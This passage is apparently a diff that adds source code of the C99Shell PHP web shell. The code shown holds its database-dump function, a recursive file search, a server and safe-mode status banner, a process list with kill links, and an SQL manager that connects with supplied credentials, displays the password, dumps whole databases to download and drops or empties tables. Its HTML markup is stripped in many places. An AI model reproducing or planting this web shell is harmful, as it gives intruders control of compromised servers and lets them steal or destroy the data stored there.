+  else {return "Error in protocol: segmentation failed! (".$data.") ";}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: 
    ".$sql_query_error."
    ";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "";
+  if ($tbl_struct)
+  {
+   echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    		Fields:
    ";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";}
+   echo "
    ";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+
+{
+ $safemode = TRUE;
+ $hsafemode = "ON (secure)";
+}
+else {$safemode = FALSE; $hsafemode = "OFF (not secure)";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";}
+else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><?php echo getenv("HTTP_HOST"); ?> - phpshell
    !C99Shell v. !
    Software:  
    uname -a: ",1); ?> 
    ",1);} else {echo get_current_user();} ?> 
    Safe-mode: 
    ".htmlspecialchars($b).DIRECTORY_SEPARATOR."";
+ $i++;
+}
+echo "   ";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "[ ok ]";
+ echo "".view_perms(fileperms($d))."";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "[ Read-Only ]";
+ echo "".view_perms_color($d)."";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)";
+}
+echo "
    ";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "".$letter."";}
+   $letters .= " ] ";
+  }
+ }
+ if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "".$item[0]."    ";
+ }
+}
+echo "

    ";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";}
+echo "";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";}
+     $line[] = "KILL";
+     $prcs[] = $line;
+     echo "";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "";}
+
+   else {$y = "";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i".trim($head[$i])."";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "";
+    }
+   }
+  }
+  $head[$k] = "".$head[$k]."".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "
    ";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?>
    Attention! SQL-Manager is NOT ready module! Don't reports bugs.
    ";
+ if (!$sql_sock) {?>";
+ }
+ echo "
    SQL Manager:
    ";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "
    Can't connect
    "; echo "".$err."";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    ";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
+  echo "
    ";
+ }
+ echo "
     i 
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
    •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    		">Home
    ".htmlspecialchars($sql_db)." ]---
    ";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?>    		Home
    Please, select database
    		";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    ";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
+   echo "
    ";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "
    ";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: 
    ".$sql_query_error."
    ";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?>
    Create new table:
     
    		Dump DB:
    "> 
    ";}
+    if ($sql_act == "newtbl")
+    {
+     echo "";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "
    SQL-Dump:

    ";
+     echo "DB: 

    ";
+     $v = join (";",$dmptbls);
+     echo "Only tables (explode \";\") 1: 

    ";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "File: 

    ";
+     echo "Download:  

    ";
+     echo "Save to file:  ";
+     echo "



    1 - all, if empty";
+     echo "
    ";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).").";
+      }
+     }
+     else {echo "Dump: nothing to do!";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    ";
+     echo "Structure ]   ";
+     echo "Browse ]   ";
+     echo "Dump ]   ";
+     echo "Insert ]   ";
+     if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "

    Inserting row into table:
    ";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "
    ";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "";
+        $i++;
+       }
+       echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    ";
+       echo "Insert as new row";
+       if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";}
+       echo "

    ";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "
    ";
+      echo "\"Pages\" ";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";}
+       else {echo " ";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "
    From:  To:  
    ";
+      echo "
    ";
+      echo "";
+      echo "";
+      for ($i=0;$i";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "".$v."";}
+       else {echo "".$v."\"".$m."\"";}
+       echo "";
+      }
+      echo "";
+      echo "";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "NULL";}
+        echo "";
+        $i++;
+       }
+       echo "";
+       echo "";
+      }
+      mysql_free_result($result);
+      echo "
    Action
    ".$v."";
+       echo "\"Delete\" ";
+       echo "\"Edit\" ";
+       echo "
     
    ";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "
    ";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "";
+       echo "";
+       echo "";
+       echo "";
+       echo "";
+       echo "";
+       echo "";
+       echo "";
+       echo "";
+       echo "";
+       $i++;
+      }
+      echo "";
+      echo "";
+      echo "";
+      echo "";
+      echo "";
+      echo "";
+      echo "";
+      echo "";
+      echo "";
+      echo "";
+      echo "
    Table
    		RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    		".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."
     
    ";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    		View File:
     
    ";
+    if ($sql_act == "newdb")
+    {
+     echo "";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:     ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "
    Server-status variables:

    ";
+     echo "";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
+     echo "
    NameValue
    ".$row[0]."".$row[1]."
    ";
+     mysql_free_result($result);
+    }
